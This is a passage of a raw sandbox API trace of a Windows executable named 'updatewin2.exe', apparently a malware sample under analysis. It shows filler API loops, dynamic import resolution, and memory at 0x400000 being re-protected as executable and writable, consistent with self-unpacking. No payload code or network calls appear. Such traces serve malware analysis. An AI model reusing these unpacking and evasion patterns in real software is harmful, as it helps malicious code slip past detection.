(lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.513] AddAtomA (lpString=0x0) returned 0x0 [0078.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.514] AddAtomA (lpString=0x0) returned 0x0 [0078.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.515] AddAtomA (lpString=0x0) returned 0x0 [0078.515] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.534] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0078.534] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0078.534] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0078.534] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0078.535] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0078.535] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0078.535] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0078.535] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0078.535] SetErrorMode (uMode=0x400) returned 0x0 [0078.535] SetErrorMode (uMode=0x0) returned 0x400 [0078.535] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}5w") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0078.535] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0078.539] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0078.746] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.748] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76e10000 [0078.748] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0078.748] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSize") returned 0x76e2196e [0078.748] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0078.748] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0078.748] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0078.748] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0078.748] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0078.749] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0078.750] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeSListHead") returned 0x773594a4 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0078.751] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0078.752] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0078.753] GetProcAddress (hModule=0x76e10000, lpProcName="WideCharToMultiByte") returned 0x76e2170d [0078.753] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0078.753] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0078.753] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0078.847] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0078.848] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0078.848] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0078.848] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileExW") returned 0x76e31811 [0078.848] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0078.848] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0078.848] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0078.849] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0078.849] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineA") returned 0x76e251a1 [0078.849] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0078.849] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0078.849] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0078.849] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0078.849] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0078.850] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0078.850] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x753b0000 [0078.850] GetProcAddress (hModule=0x753b0000, lpProcName="PathAppendW") returned 0x753c81ef [0078.850] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0078.855] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0078.855] atexit (param_1=0x5b63d8) returned 0 [0078.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5f4 | out: lpSystemTimeAsFileTime=0x18f5f4*(dwLowDateTime=0x9e283c40, dwHighDateTime=0x1d5d6b4)) [0078.857] GetCurrentThreadId () returned 0x924 [0078.857] GetCurrentProcessId () returned 0x914 [0078.857] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5ec | out: lpPerformanceCount=0x18f5ec*=22013833474) returned 1 [0078.865] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0078.867] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.867] GetLastError () returned 0x57 [0078.868] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.868] GetLastError () returned 0x57 [0078.868] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0078.868] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0078.868] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.868] GetLastError () returned 0x57 [0078.868] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0078.868] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0078.870] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.870] GetLastError () returned 0x57 [0078.870] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.870] GetLastError () returned 0x57 [0078.870] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76e10000 [0078.871] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0078.871] GetProcessHeap () returned 0x5a0000 [0078.871] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.871] GetLastError () returned 0x57 [0078.871] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0078.871] GetLastError () returned 0x57 [0078.871] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0078.871] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x364) returned 0x5cad00 [0078.872] SetLastError (dwErrCode=0x57) [0078.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xc00) returned 0x5cb070 [0078.874] GetStartupInfoW (in: lpStartupInfo=0x18f528 | out: lpStartupInfo=0x18f528*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033e0, hStdOutput=0xbf8435cf, hStdError=0xfffffffe)) [0078.874] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0078.874] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.874] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe\" " [0078.874] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe\" " [0078.874] IsValidCodePage (CodePage=0x4e4) returned 1 [0078.874] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f548 | out: lpCPInfo=0x18f548) returned 1 [0078.874] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee10 | out: lpCPInfo=0x18ee10) returned 1 [0078.874] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.874] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0078.874] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x18ee24 | out: lpCharType=0x18ee24) returned 1 [0078.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.875] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0078.875] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0078.875] GetLastError () returned 0x57 [0078.875] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0078.875] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.875] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0078.875] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f324, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17\x9bÝ¿`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0078.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.876] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0078.876] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0078.876] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 